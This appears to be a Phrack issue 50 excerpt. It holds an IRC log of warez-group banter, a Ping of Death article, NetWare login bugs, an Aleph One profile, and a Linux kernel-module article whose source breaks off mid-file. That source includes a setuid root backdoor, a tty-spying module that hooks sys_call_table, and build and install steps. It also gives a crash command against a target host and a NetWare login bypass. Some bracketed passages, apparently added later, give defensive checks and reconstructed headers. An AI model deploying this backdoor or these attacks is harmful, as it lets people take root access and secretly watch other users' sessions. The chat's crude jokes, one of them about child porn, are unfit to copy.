*** #supreme _e|f_ 848703589
*** Users on #supreme: d9 @{Imagine} @BL|ZZaRD @W|ZaRD @|COBRA| @_e|f_
<_e|f_> re d9
*** Mode change "+o d9" on channel #supreme by _e|f_
<|COBRA|> today is going to be a bad day :(
*W|ZaRD* would you be interested in merging with like 4-6 other groups to become 1 group.??
*W|ZaRD* i mean. all the other groups have like 11 sitez and 8-10 suppliers like NGP
*W|ZaRD* and if we merge we could be up there with Prestige, and Razor
<_e|f_:#supreme> hello d9
*W|ZaRD* i mean. all the other groups have like 11 sitez and 8-10 suppliers like NGP
-> *W|ZaRD* hmm
*** Inviting w0zz to channel #supreme
<_e|f_> we got a discussion going on here for big plans for a lot of us "smaller" groups (smaller as
compared to razor, prestige etc) :)
ah
*** Mystic12 (NONE@wheat-53.nb.net) has joined channel #supreme
<_e|f_> this is all still in discussion stages
hahahaha
*** Mode change "+o Mystic12" on channel #supreme by W|ZaRD
<_e|f_:#supreme> but would you be interested in a joint venture between a few of us smaller release groups
to combine into one large release group - to challenge razor and prestige?
w0zz
you've been sucked into warez kiddie conspiracies
join me
where are you?
*** Inviting w0zz to channel #supreme
*** w0zz (wozz@big.wookie.net) has joined channel #supreme
well...
*** Mode change "+o w0zz" on channel #supreme by d9
werd
<_e|f_> re wozz
hi w0zz
hi there
<_e|f_> i can send u a log to flesh out a few more details if you like
i've got mackin' warez
hmm
sure
*w0zz* you recording this for line noise ?
*w0zz* ;)
-> *w0zz* indeed...;)
*w0zz* heh
the thing is, I have all this porn I want to unload...
yah, i got da mackin porn too
but, no good place to distro it...
*** ^DRiFTeR^ (~Drifter@203.30.237.48) has joined channel #supreme
*** Mode change "+o ^DRiFTeR^" on channel #supreme by _e|f_
<_e|f_> hey drifter
I was using this panix account, but all that SYN flooding stopped that cold...
<_e|f_> drifter is muh vp :)
do you even know what BREED is, route?
warez pups?
<_e|f_:#supreme> drifter: d9 and wozz are from breed
<_e|f_:#supreme> blizzard and wizard are from NGP
<^DRiFTeR^:#supreme> k
HAHAHAhahahaha
I am also from NGP
*** Signoff: Mystic12 (Leaving)
so is Mystic12
well, looks like it. just wondered if you knew them at all
w0zz... you get the new shit I send you?
*** Mystic12 (NONE@wheat-53.nb.net) has joined channel #supreme
yah
<_e|f_:#supreme> sorry mystic - didnt see yew there
nope!
*** Mode change "+o Mystic12" on channel #supreme by W|ZaRD
indexed and everything
hahaha
i spanked my monkey for hours
whee
werd.
AAAAAHAHAHahahhahaha WOZZ!
<_e|f_> brb
hmm
#supreme Mystic12 H@ NONE@wheat-53.nb.net (CCINC)
#supreme ^DRiFTeR^ H@ ~Drifter@203.30.237.48 (ReaLMS oF Da NiTe - HrD)
#supreme w0zz H@ wozz@big.wookie.net (w0zz)
#supreme d9 H@ plugHead@onyx.infonexus.com (Built Demon Tough)
#supreme {Imagine} H@ BOB@199.190.110.99 (.:tORn f#E?h:. v1.45 by SLaG)
#supreme BL|ZZaRD H@ blizzard@ip222.tol.primenet.com (hehe)
#supreme W|ZaRD H@ m3ntal@ip201.tol.primenet.com (M3NTaL)
#supreme |COBRA| H@ cobra@slbri3p24.ozemail.com.au (100% ReVpOwEr)
#supreme _e|f_ H@ _e|f_@203.26.197.12 (blah)
werd
*** Mode change "-ooo _e|f_ |COBRA| W|ZaRD" on channel #supreme by d9
*** Mode change "-ooo BL|ZZaRD w0zz ^DRiFTeR^" on channel #supreme by d9
*** Mode change "-o Mystic12" on channel #supreme by d9
hehe
*** Mode change "+o w0zz" on channel #supreme by d9
<_e|f_> sigh
what would the new group name be.. if this happened?
the new name?
hmm. nice takeover
hehe
werd
w0zz, what do you think?
new group name
<_e|f_> d9: ops plz
r00t? guild?
wait
<_e|f_> this is only a temp channel neway d9
guild wuz already used
those are taken...
<_e|f_> so its a waste to do a takeover
i like r00t
oh
yeah
those guys are eleet
yah
I hear r00t has this 10 year old that can break into .mil sites...
*** d9 is now known as daemon9
duod, he's like D.A.R.Y.L.
hehe
yah..
<_e|f_> d9: i take it by this yew aint interested?
<_e|f_> :\
anyway, bak to pr0n.
anywayz.. op me d00d
me too
must have m0re pr0n
*** Mode change "+m" on channel #supreme by daemon9
yes
*** w0zz has left channel #supreme
more pr0n
werd
that rooled
mega-pr0n
porn
hehe
kiddie-pr0n
op me plz
wizard, you are fine the way you are.
*** w0zz is now known as [w0zzz]
*** daemon9 has left channel #supreme
*** daemon9 is now known as r0ute
hahaha
<[w0zzz]> heh
that was fun.
good way to wake up from a nap
----<>----
Large Packet Attacks
(AKA Ping of Death)
---------------------------------
[ Introduction ]
Recently, the Internet has seen a large surge in denial of service
attacks. A denial of service attack in this case is simply an action of some
kind that prevents the normal functionality of the network. It denies service.
This trend began a few months back with TCP SYN flooding and continues with the
"large packet attack". In comparison with SYN flooding, the large packet attack
is a much simpler attack in both concept (explained below) and execution
(the attack can be carried out by anyone with access to a Windows 95 machine).
TCP SYN flooding is more complex in nature and does not exploit a flaw so much
as it exploits an implementation weakness.
The large packet attack is also much more devastating than TCP SYN
flooding. It can quite simply cause a machine to crash, whereas SYN flooding
may just deny access to the mail or web services of a machine for the duration
of the attack. For more information on TCP SYN flooding see Phrack 49, article
13.
(NOTE: The large packet attack is somewhat misleadingly referred to as 'Ping of
Death' because it is often delivered as a ping packet. Ping is a program that
is used to test a machine for reachability, to see if it is alive and accepting
network requests. Ping also happens to be a convenient way of sending the
large packet over to the target.)
The large packet attack has caused no end of problems to countless
machines across the Internet. Since its discovery, *dozens* of operating
system kernels have been found vulnerable, along with many routers, terminal
servers, X-terminals, printers, etc. Anything with a TCP/IP stack is in fact,
potentially vulnerable. The effects of the attack range from mild to
devastating. Some vulnerable machines will hang for a relatively short period
of time then recover, some hang indefinitely, others dump core (writing a huge
file of current memory contents, often followed by a crash), some lose
all network connectivity, many reboot or simply give up the ghost.
[ Relevant IP Basics ]
Contrary to popular belief, the problem has nothing to do with the
`ping` program. The problem lies in the IP module. More specifically,
the problem lies in the fragmentation/reassembly portion of the IP module.
This is the portion of the IP protocol where packets are broken into smaller
pieces for transit, and also where they are reassembled for processing. An IP
packet has a maximum size constrained by a 16-bit header field (a header is the
portion of a packet that contains information about the packet, including
where it came from and where it is going). The maximum size of an IP packet
is 65,535 (2^16-1) bytes. The IP header itself is usually 20 bytes, so this
leaves us with 65,515 bytes to stuff our data into. The underlying link layer
(the link layer is the network logically under IP, often ethernet) can seldom
handle packets this large (ethernet, for example, can only handle packets up to
1500 bytes in size). So, in order for the link layer to be able to digest a
large packet, the IP module must fragment (break down into smaller pieces)
each packet it sends down to the link layer for transmission on the network.
Each individual fragment is a portion of the original packet, with its own
header containing information on exactly how the receiving end should put it
back together. Putting the individual fragments back together is called
reassembly. When the receiving end has all of the fragments, it reassembles
them into the original IP packet, and then processes it.
[ The attack ]
The large packet attack is quite simple in concept. A malicious user
constructs a large packet and sends it off. If the destination host is
vulnerable, something bad happens (see above). The problem lies in the
reassembly of these large packets. Recall that we have 65,515 bytes of space
into which to stuff data. As it happens, a few misbehaved applications
(and some specially crafted evil ones) will allow one to place slightly more
data into the payload (say 65,520 bytes). This, along with a 20 byte IP
header, violates the maximum packet size of 65,535 bytes. The IP module will
then simply break this oversized packet into fragments and send them to
their intended destination (target). The receiving host will queue all of the
fragments until the last one arrives, then begin the process of reassembly.
The problem surfaces when the IP module finds that the packet is in
fact larger than the maximum allowable size, as an internal buffer is
overflowed. This is where something bad happens (see above).
[ Vulnerability Testing and Patching ]
Testing to see if a network device is vulnerable is quite easy.
Windows NT and Windows 95 will allow construction of these oversized
packets without complaining. Simply type: `ping -l 65508 targethost`. In
this case, we are delivering an oversized IP packet inside of a ping packet,
which has a header size of 8 bytes. If you add up the totals, 20 bytes of IP
header + 8 bytes of ping header + 65,508 bytes of data, you get a 65,536 byte
IP packet. This is enough to cause affected systems to have problems.
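The arithmetic above (20 + 8 + 65,508 = 65,536) is exactly what a receiver's
reassembly code has to check before it copies a fragment into its buffer. The
following is an added example, not code from the article or from any kernel:
it models a sender that fragments an oversized payload for an Ethernet MTU the
way the misbehaving stacks did, and a receiver that performs the bounds check
the vulnerable stacks lacked, rejecting the datagram instead of overflowing.
The ping payload it builds is constructed, with a plain 8-byte ICMP echo
header and no checksum.

```python
"""IP fragment reassembly with the missing bounds check (added example)."""

IP_HDR_LEN = 20                              # usual IP header, as in the text
ICMP_HDR_LEN = 8                             # ping (ICMP echo) header
MAX_DATAGRAM = 65535                         # 16-bit total-length field
MAX_PAYLOAD = MAX_DATAGRAM - IP_HDR_LEN      # 65,515 bytes of data


def fragment(payload: bytes, mtu: int = 1500):
    """Split an IP payload into (offset_in_8byte_units, more_fragments, data)
    tuples the way a sender's IP module does for the given MTU. Like the
    misbehaving senders in the text, it does NOT refuse payloads larger than
    MAX_PAYLOAD; catching that is left to the receiver."""
    chunk = (mtu - IP_HDR_LEN) // 8 * 8      # 1480 data bytes per Ethernet frame
    frags = []
    for off in range(0, len(payload), chunk):
        data = payload[off:off + chunk]
        more = off + len(data) < len(payload)
        frags.append((off // 8, more, data))
    return frags


def reassembled_length(frags) -> int:
    """Total datagram length (IP header + data) the fragments would rebuild."""
    end = max(off8 * 8 + len(data) for off8, more, data in frags)
    return IP_HDR_LEN + end


def checked_reassemble(frags):
    """Receiver-side reassembly that checks bounds BEFORE copying each fragment
    into the fixed 65,515-byte buffer. Returns (ok, total_length, data); an
    oversized datagram yields ok=False and no data, where a vulnerable stack
    would have written past the end of its buffer."""
    buf = bytearray(MAX_PAYLOAD)
    end = 0
    for off8, more, data in sorted(frags):   # fragments may arrive out of order
        start = off8 * 8
        if start + len(data) > MAX_PAYLOAD:  # the check the bug lacked
            return False, IP_HDR_LEN + start + len(data), b""
        buf[start:start + len(data)] = data
        end = max(end, start + len(data))
    return True, IP_HDR_LEN + end, bytes(buf[:end])


def ping_payload(data_len: int) -> bytes:
    """IP payload of `ping -l data_len` (constructed): 8-byte ICMP echo header
    of type 8, code 0, zero checksum/id/seq, followed by data_len bytes."""
    return b"\x08\x00" + b"\x00" * (ICMP_HDR_LEN - 2) + b"A" * data_len


if __name__ == "__main__":
    for n in (65507, 65508):
        ok, total, _ = checked_reassemble(fragment(ping_payload(n)))
        print(f"ping -l {n}: datagram {total} bytes ->", "ok" if ok else "rejected")
```

With -l 65507 the datagram is exactly 65,535 bytes and reassembles; with
-l 65508 the last fragment ends one byte past the buffer and is refused.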
Defense is preventative. The only way to really be safe from this
attack is to either ensure your system is patched, or unplug its network tap.
There are patches available for just about every vulnerable system. For
a copious list of vulnerable systems and patches, check out a 'Ping of Death'
webpage near you.
daemon9
Editor, Phrack Magazine
(daemon9@netcom.com)
---------------------------------------------------------------------------
To: route@onyx.infonexus.com
From: xxxx xxxxxxxxxxx
Subject: Re: ?
Status: RO
Actually, hang on. I've looked your story up and down looking for ways to
make it more interesting and I can't. I think it's actually just too
technical for us and lacks a newsworthiness that was evident in the SYN
article. I mean, you never tell us why we should care about this, and
frankly, I don't know why we should. So, you're welcome to take another
pass at it, otherwise, I'll give you the kill fee of $100.
xxxx
[ Too technical? Any less technical and I would have to make everything
rhyme so people wouldn't fall asleep. ]
---------------------------------------------------------------------------
----<>----
Netware Insecurities
Tonto
[the rant]
I realize that to most security professionals and
system administrators who will see this magazine,
the term "NetWare security" is a punchline. That
unfortunately does not change the fact that many
people in the field, myself included, must deal
with it daily. Really, honestly, I do agree with
you. Please don't write me to tell me about how
futile it is. I already know.
Since its release, not much security news has really
surfaced surrounding Novell NetWare 4. A lot of the
security flaws that were present in 3.1x were 'fixed'
in 4.x since Novell pretty much redesigned the way
the user/resource database worked, was referenced,
and stored. Some flaws remained, although fixes for
them are well-known, and easily applied. However,
NetWare 4 came with its own batch of new security
flaws, and Novell has done a poor job of addressing
them, hoping that consumer-end ignorance and the
client/server software's proprietary design will hide
these holes. You'd figure they would know better by
now.
The ability to use a packet sniffer to snag RCONSOLE
passwords still exists; NetWare 4 institutes client-end
authentication to implement its auto-reconnect feature;
the list goes on. Below are just a couple of examples
of such bugs and how to deal with them. As new Novell
products bring many existing LANs out onto the Internet,
I think you will see more of this sort of thing coming
to the surface. I hope that when it does, Novell decides
to take a more responsible role in security support for
its products. I'd hate for such a widely used product
to become the next HP/UX.
[the exploits]
[BUG #1]
This bug is known to affect NetWare 4.10. It's probably present in 4.01
and other versions that support Directory Services, but I haven't
verified this. I'm only a CNA, so I tried to verify this bug by talking
to a group of CNEs and nobody had heard of this, although there are
apparently other bugs in previous versions of LOGIN.EXE.
The bug is a combination of some weak code in LOGIN-4.12
(SYS:\LOGIN\LOGIN.EXE) and a default User object in NDS - the user template
USER_TEMPLATE. LOGIN allows input fields to be passed directly, instead
of filtered, if they are passed to LOGIN correctly -- by specifying an
object's context explicitly (as opposed to implicitly by using CX) and
putting the User object's name in quotes.
F:\PUBLIC>LOGIN SVR1/"USER_TEMPLATE"
For Server object SVR1 in an appropriate context, this would probably work
and give a generic level of user access, perhaps to other volumes,
programs, etc. That will vary depending on the setup of the server.
The fix is simple. Load SYS:\PUBLIC\NWADMIN.EXE and disable the user
template's login. But from now on, you will have to manually enable
login for any new User objects created in your tree.
[BUG #2]
This isn't a bug as much as a failed attempt to add security to a DOS file
system. But since Novell touts (and teaches) it as a file system security
tool, it is worth addressing.
NetWare comes with a tool called FLAG, which is supposed to be the NetWare
equivalent of UNIX's chmod(), in that it controls file attributes for files
on local and NetWare file systems. The problem is that Novell
thought it would be neat to incorporate its tool into the world of DOS file
attributes as well. So they made FLAG alter DOS file attributes
automatically to correspond with the new attributes installed by FLAG.
This would've been cool, except that DOS's ATTRIB.EXE can also be used to
change the DOS-supported file attributes set by FLAG (Archive, Read-only,
Hidden, and System, respectively). And since ATTRIB doesn't reference NDS
in any way, the problem is obvious: a file that was marked Read-only by
its owner, using FLAG, could be compromised by a user other than its owner,
with ATTRIB, and then altered or deleted.
There isn't an easy fix for something that is this broken, so it is
simply recommended that you use IRFs (carefully) to designate file rights
on your server.
[ 01-07-97 - Tont0 ]
----<>----
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
4 of 16
-:[ Phrack Pro-Phile ]:-
Aleph One
~~~~~~~~~
Personal
~~~~~~~~
Handle: Aleph One
Call him: Aleph
Past handles: None
Handle origin: Transfinite Math
("Infinity and the Mind" by Rudy Rucker)
Date of Birth: 1974
Height: 6 feet
Weight: No idea.
Eye color: Olive
Hair Color: Dark Brown
Computers: Two
Admin of: Underground.Org, and BugTraq
Sites Frequented: None. I got better things to do with my time.
URLs: http://www.disinfo.com/
Favorite Things
~~~~~~~~~~~~~~~
Women: Intelligent, sexy with beautiful eyes and class.
Cars: None. They are a pain. Ride a motorcycle.
Foods: Exotic. Sushi (Anago), Arab, Chinese, Vietnamese,
Thai, Indian, Ethiopian. Seafood. Meat. Anything on
a grill. Anything flambé. Wine: Chianti.
Music: Techno: Leftfield, Orbital, Underworld, Electric
Skychurch, Prodigy, Juno Reactor,
Chemical Brothers, Ambient, Goa Trance.
Rock: Tool, Marilyn Manson, Beck, Garbage, NIN.
Classical: Bach, Baroque
Soundtracks: Natural Born Killers, The Piano, Braveheart,
Rob Roy.
Books: "Gödel, Escher, Bach" by Douglas R. Hofstadter
"Infinity and the Mind" by Rudy Rucker
"100 Years of Solitude" (in Spanish)
by Gabriel García Márquez
"Metamorphosis" by Kafka
Turn Ons: Intelligence. Class. Pierced belly buttons.
Tasteful tattoos. Long hair.
Turn Offs: Ignorance. Attitude. Bad tattoos.
Other passions, interests, loves:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Painting - Went to a painting/drawing class for 3 years. Did
everything from pencil, pastels, up to watercolors. I stopped going
when I started working with oils. I haven't painted in almost 7 years.
Too bad, I enjoyed it.
Math - For some reason I always liked math. I hated doing exercises,
but always liked the theory. Guess that's why my grades were not
better. I was intending to do a minor in math but I quit school
before that ever happened...
Reading - One of the things I value the most are my books. I really enjoy
reading. Sadly, lately, all I read are technical books. I need to
start reading other stuff again.
AI - When I started fooling around with computers I wanted to go into AI,
but the lack of material at my disposition at the time kept me from
delving into it too much.
Most memorable experiences:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Death - It marks your life for ever.
Burning Man '95 - One of the most intense experiences of my life.
Nothing can compare to the creation and expression of this community
that grows and dies in one of the most inhospitable, yet more
beautiful, places on earth.
Some people to mention:
~~~~~~~~~~~~~~~~~~~~~~~
Annaliza (for all the rides from work, all the adventures, always being
there, and the hot cocoa)
Luis (for all the good times, the bad times, and being one fucking
crazy Spanish cosaco)
Mr. Upsetter, Buckaroo Banzai, Dan, Rod & Rika, Sir Dystic, Freqout,
White Knight & Loren (for being good friends)
Intrepid Traveller (for giving me the number to Lunatic Labs)
Noid, Pappy, Phax, Elvis Smurf, Ming of Mongo, TRW, Clockwork, and the
rest of the old LA 2600 crew (for being themselves)
Veggie (for being larger than life)
Mycroft (who would have thought?)
r00t (for being elite)
A few things you would like to say:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Knowledge comes from within.
The New Security Threat: Disinformation
Statistics show that network break-ins are on the rise. Entities
connecting to the Net expect to be broken into. They know it's only
a matter of time before some random hacker targets their machines using
the latest warez to bypass their firewall and break into their machine.
They have seen it happen over and over: the CIA, DOJ, NASA, MGM/UA, etc.
The modus operandi is always the same: deface the web page, or trash the
machines. For this occurrence they have prepared. Backups are in place, and
ready to be used. Hacked web pages hardly stay up more than half an hour
before they are taken down. Whatever message the hackers wanted to deliver
was probably only seen by a handful of people. There no longer is any
incentive to hack a web site that no one will see.
So what is next? Disinformation.
The Internet as a medium facilitates the free flow of information. Single
individuals can reach large, previously unreachable audiences. Information
that before would have been relegated to some obscure corner now travels at
the speed of light and is disseminated all over the world. Every day the Net
is becoming a more important source of leads and information for the standard
news media. It usually takes only a few hours before some piece of
information, such as a new product or a new bug, published on the Net appears
on TV or on some newspaper's web site. And as more companies publish
information online, our dependence on the Net as a source of information will
only increase.
But the medium does not attempt to validate or even authenticate this
information in most cases. An anonymous tip on some newsgroup or web site
can cause a company a lot of headaches. Even worse are half-truths.
Just look at the damage control that corporations such as Microsoft and Intel
had to do in the past. But this is only the beginning.
What if that motivated hacker decides that instead of replacing the
company's web site with some obscene language and graphics that will be
taken down almost immediately, we will add a small, officially worded press
release to the web site? How long until someone notices? How long until
they realize it's a fake? Maybe we should also email the press release to
some media contacts. What are the chances that it will be caught before it
makes it into the news? Or that it will be caught before it's discussed on
some newsgroup with a large audience?
The amount of damage control that a well placed piece of information
coming from a seemingly reputable source can require is incredible. This, I
believe, is where future attacks lie.
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
5 of 16
============================================
Abuse of the Linux Kernel for Fun and Profit
halflife@infonexus.com
[guild corporation]
============================================
Introduction
------------
Loadable modules are a very useful feature in linux, as they let
you load device drivers on an as-needed basis. However, there is
a bad side: they make kernel hacking almost TOO easy. What happens
when you can no longer trust your own kernel...? This article describes
a simple way kernel modules can be abused.
System calls
------------
System calls. These are the lowest level of functions available, and
are implemented within the kernel. In this article, we will discuss how
they can be abused to let us write a very simplistic tty hijacker/monitor.
All code was written and designed for linux machines, and will not compile
on anything else, since we are mucking with the kernel.
TTY Hijackers, such as tap and ttywatcher are common on Solaris,
SunOS, and other systems with STREAMS, but Linux thus far has not had
a useful tty hijacker (note: I don't consider pty based code such as
telnetsnoop to be a hijacker, nor very useful since you must make
preparations ahead of time to monitor users).
Since linux currently lacks STREAMS (LinSTREAMS appears to be dead),
we must come up with an alternative way to monitor the stream. Stuffing
keystrokes is not a problem, since we can use the TIOCSTI ioctl to stuff
keystrokes into the input stream. The solution, of course, is to redirect
the write(2) system call to our own code, which logs the contents of the
write if it is directed at our tty; we can then call the real write(2)
system call.
Clearly, a device driver is going to be the best way to do things. We
can read from the device to get the data that has been logged, and add
an ioctl or two in order to tell our code exactly which tty we want to log.
Redirection of system calls
---------------------------
System calls are pretty easy to redirect to our own code. It works in
principle like DOS terminate-and-stay-resident code: we save the old
address in a variable, then set a new one pointing to our code. In our
code, we do our thing, and then call the original code when finished.
A very simple example of this is contained in hacked_setuid.c, a small
loadable module that you can insmod; once it is inserted into the kernel,
a setuid(4755) will set your uid/euid/gid/egid to 0. (See the appended
file for all the code.) The addresses of the syscall handlers are
contained in the sys_call_table array, so redirecting a syscall is just
a matter of overwriting its slot with the address of our function. Once
we have done this, many things are possible... (On current kernels
sys_call_table is no longer exported to modules and the page holding it
is write-protected, so this exact trick takes more work, but the idea is
the one every later Linux kernel rootkit built on.)
Linspy notes
------------
This module is VERY easy to spot: cat /proc/modules and it shows up as
plain as day. Things can be done to fix this, but I have no intention of
doing them.
To use linspy, you need to create an ltap device node with major 40 and
minor 0 (mknod /dev/ltap c 40 0; the path must match DEVICE_NAME in the
Makefile). After you do that, run make and then insmod the linspy
module. Once it is inserted, you can run ltread [tty], and if all goes
well you should see whatever is output to that user's screen. If all does
not go well... well, I shall leave that to your nightmares.
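As an added check, not part of the article or the linspy sources: the two
detection angles the text names, written as a small userland probe. The
behavioural one exploits the backdoor's own contract (as an unprivileged
user, setuid(4755) must fail with EPERM; if it "succeeds" and leaves us
with euid 0, sys_setuid has been replaced), and the second one is the
/proc/modules listing the author says gives the module away. The
/proc/modules sample embedded below is constructed, and the module name
"linspy" is simply the one this article uses. On a machine without the
module the probe reports clean, or inconclusive when run as root, where a
real setuid(4755) would legitimately succeed.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/*
 * Behavioural probe for a hooked setuid(2).
 * Returns 1 = backdoor present, 0 = clean, -1 = inconclusive (we are
 * already root, so a genuine setuid(4755) would succeed and change our uid).
 */
int probe_setuid_backdoor(void)
{
    if (geteuid() == 0)
        return -1;
    int rc = setuid(4755);          /* must fail with EPERM on a clean kernel */
    if (rc == 0 && geteuid() == 0)  /* succeeded AND made us root: hooked */
        return 1;
    return 0;
}

/*
 * Does a /proc/modules-style listing (one module per line, name first)
 * contain `name` as a whole first field?  Pure string logic so it can be
 * exercised on constructed input.
 */
int modules_text_contains(const char *text, const char *name)
{
    size_t n = strlen(name);
    const char *p = text;
    while (*p) {
        if (strncmp(p, name, n) == 0 &&
            (p[n] == ' ' || p[n] == '\t' || p[n] == '\n' || p[n] == '\0'))
            return 1;
        p = strchr(p, '\n');        /* advance to the next line */
        if (!p) break;
        p++;
    }
    return 0;
}

/* Read the real module list; 1 = loaded, 0 = not, -1 = unreadable. */
int module_is_loaded(const char *path, const char *name)
{
    FILE *fp = fopen(path, "r");
    if (!fp) return -1;
    char buf[65536];
    size_t got = fread(buf, 1, sizeof buf - 1, fp);
    fclose(fp);
    buf[got] = '\0';
    return modules_text_contains(buf, name);
}

/* Constructed sample of what /proc/modules looked like with linspy loaded. */
static const char SAMPLE_MODULES[] =
    "linspy 1024 0\n"
    "ne 3456 1 (autoclean)\n"
    "serial 8192 0\n";

int main(void)
{
    int r = probe_setuid_backdoor();
    printf("setuid(4755) probe: %s\n",
           r == 1 ? "BACKDOOR" : r == 0 ? "clean" : "inconclusive (running as root)");
    int m = module_is_loaded("/proc/modules", "linspy");
    printf("linspy in /proc/modules: %s\n",
           m == 1 ? "yes" : m == 0 ? "no" : "unreadable");
    printf("sample listing mentions linspy: %d\n",
           modules_text_contains(SAMPLE_MODULES, "linspy"));
    return r == 1 || m == 1;
}
```

Hiding the module from /proc/modules (the "things that can be done" above)
defeats the second check but not the first; the behavioural probe only
misses if the trigger value is changed, which is why rootkit hunters
compare the live sys_call_table against System.map rather than guessing
trigger values.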
The Code [use the included extract.c utility to unarchive the code]
---------------------------------------------------------------------
<++> linspy/Makefile
CONFIG_KERNELD=-DCONFIG_KERNELD
CFLAGS = -m486 -O6 -pipe -fomit-frame-pointer -Wall $(CONFIG_KERNELD)
CC=gcc
# this is the name of the device you have (or will have) made with mknod
DN = '-DDEVICE_NAME="/dev/ltap"'
# 1.2.x kernels need this to compile; leave it commented out on 1.3+ kernels
V = #-DNEED_VERSION
MODCFLAGS := $(V) $(CFLAGS) -DMODULE -D__KERNEL__ -DLINUX
# recipe lines below must be indented with a tab
all: linspy ltread setuid
linspy: linspy.c /usr/include/linux/version.h
	$(CC) $(MODCFLAGS) -c linspy.c
ltread: ltread.c
	$(CC) $(DN) -o ltread ltread.c
clean:
	rm -f *.o ltread
setuid: hacked_setuid.c /usr/include/linux/version.h
	$(CC) $(MODCFLAGS) -c hacked_setuid.c
<--> end Makefile
<++> linspy/hacked_setuid.c
/* errno is referenced by the _syscall1() wrapper below; there is no libc
   inside the kernel, so the module has to supply it itself */
int errno;
/* NOTE: the header names were lost when this page was extracted (the
   <...> parts of the #include lines were stripped).  The list below is
   what the identifiers in this file need on a 1.2/2.0-era kernel, where
   /usr/include/linux was the kernel's own include directory; treat it as
   a reconstruction, not the author's exact set. */
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/sched.h>     /* current */
#include <linux/types.h>     /* uid_t */
#include <linux/unistd.h>    /* _syscall1() */
#include <sys/syscall.h>     /* SYS_setuid */
#ifdef NEED_VERSION
static char kernel_version[] = UTS_RELEASE;
#endif
/* kernel-side wrapper so we can invoke the real setuid(2) by number */
static inline _syscall1(int, setuid, uid_t, uid);
/* the kernel's table of syscall entry points, indexed by syscall number */
extern void *sys_call_table[];
void *original_setuid;
/* replacement for sys_setuid: the magic argument 4755 is the backdoor
   trigger; anything else is passed through to the real handler */
extern int hacked_setuid(uid_t uid)
{
  int i;
  if(uid == 4755)
  {
    current->uid = current->euid = current->gid = current->egid = 0;
    return 0;
  }
  /* swap the real handler back in for the duration of the call; another
     process entering setuid(2) in that window would bypass the hook */
  sys_call_table[SYS_setuid] = original_setuid;
  i = setuid(uid);
  sys_call_table[SYS_setuid] = hacked_setuid;
  if(i == -1) return -errno;
  else return i;
}
int init_module(void)
{
  original_setuid = sys_call_table[SYS_setuid];
  sys_call_table[SYS_setuid] = hacked_setuid;
  return 0;
}
void cleanup_module(void)
{
  sys_call_table[SYS_setuid] = original_setuid;
}
<--> end hacked_setuid.c
<++> linspy/linspy.c
/* errno is referenced by the _syscall3() wrapper below; there is no libc
   inside the kernel, so the module supplies it itself */
int errno;
/* NOTE: the header names were lost when this page was extracted (the
   <...> parts of the #include lines were stripped).  The list below is
   what the identifiers in this file need on a 1.2/2.0-era kernel, where
   /usr/include/linux was the kernel's own include directory; treat it as
   a reconstruction, not the author's exact set. */
#include <linux/kernel.h>
#include <linux/sched.h>      /* current */
#include <linux/types.h>
#include <linux/fs.h>         /* struct file, struct inode, file_operations,
                                 register_chrdev, NR_OPEN */
#include <linux/errno.h>      /* EIO */
#include <linux/unistd.h>     /* _syscall3() */
#include <sys/syscall.h>      /* SYS_write */
#include <sys/sysmacros.h>    /* major(), minor() */
#include <asm/segment.h>      /* get_fs_byte(), put_fs_byte() */
#ifdef MODULE
#include <linux/module.h>
#include <linux/version.h>
#endif
/* set the version information, if needed */
#ifdef NEED_VERSION
static char kernel_version[] = UTS_RELEASE;
#endif
#ifndef MIN
#define MIN(a,b) ((a) < (b) ? (a) : (b))
#endif
/* ring buffer info: the hooked write(2) is the producer and linspy_read
   the consumer; one slot is always left free so head == tail means
   "empty".  The buffer is unsigned so bytes >= 0x80 are not returned as
   negative values, which out_queue's callers would take to mean "empty". */
#define BUFFERSZ 2048
unsigned char buffer[BUFFERSZ];
int queue_head = 0;
int queue_tail = 0;
/* taken_over indicates if the victim can see any output */
int taken_over = 0;
static inline _syscall3(int, write, int, fd, char *, buf, size_t, count);
extern void *sys_call_table[];
/* device info for the linspy device, and the device we are watching */
static int linspy_major = 40;
int tty_minor = -1;
int tty_major = 4;
/* address of original write(2) syscall */
void *original_write;
void save_write(char *, size_t);
/* pop one byte, or -1 when the ring is empty */
int out_queue(void)
{
  int c;
  if(queue_head == queue_tail) return -1;
  c = buffer[queue_head];
  queue_head++;
  if(queue_head == BUFFERSZ) queue_head=0;
  return c;
}
/* push one byte; returns 0 and drops it when the ring is full */
int in_queue(int ch)
{
  int next = queue_tail + 1;
  if(next == BUFFERSZ) next = 0;
  /* the original compared queue_tail + 1 without wrapping, so a ring that
     filled up at the end of the buffer silently became an empty one */
  if(next == queue_head) return 0;
  buffer[queue_tail] = ch;
  queue_tail = next;
  return 1;
}
/* check if it is the tty we are looking for */
int is_fd_tty(int fd)
{
struct file *f=NULL;
struct inode *inode=NULL;
int mymajor=0;
int myminor=0;
if(fd >= NR_OPEN || !(f=current->files->fd[fd]) || !(inode=f->f_inode))
return 0;
mymajor = major(inode->i_rdev);
myminor = minor(inode->i_rdev);
if(mymajor != tty_major) return 0;
if(myminor != tty_minor) return 0;
return 1;
}
/* this is the new write(2) replacement call */
extern int new_write(int fd, char *buf, size_t count)
{
  int r;
  if(is_fd_tty(fd))
  {
    if(count > 0)
      save_write(buf, count);
    /* in takeover mode the victim's output is swallowed: we report
       success so the writing program carries on, but nothing reaches
       the victim's screen */
    if(taken_over) return count;
  }
  /* swap the real handler back in for the duration of the call; another
     process entering write(2) in that window bypasses the hook, and a
     scan of sys_call_table taken in that window looks clean */
  sys_call_table[SYS_write] = original_write;
  r = write(fd, buf, count);
  sys_call_table[SYS_write] = new_write;
  if(r == -1) return -errno;
  else return r;
}
/* save data from the write(2) call into the buffer */
void save_write(char *buf, size_t count)
{
int i;
for(i=0;i < count;i++)
in_queue(get_fs_byte(buf+i));
}
/* read from the ltap device - return data from queue */
static int linspy_read(struct inode *in, struct file *fi, char *buf, int count)
{
int i;
int c;
int cnt=0;
if(current->euid != 0) return 0;
for(i=0;i < count;i++)
{
c = out_queue();
if(c < 0) break;
cnt++;
put_fs_byte(c, buf+i);
}
return cnt;
}
/* open the ltap device */
static int linspy_open(struct inode *in, struct file *fi)
{
if(current->euid != 0) return -EIO;
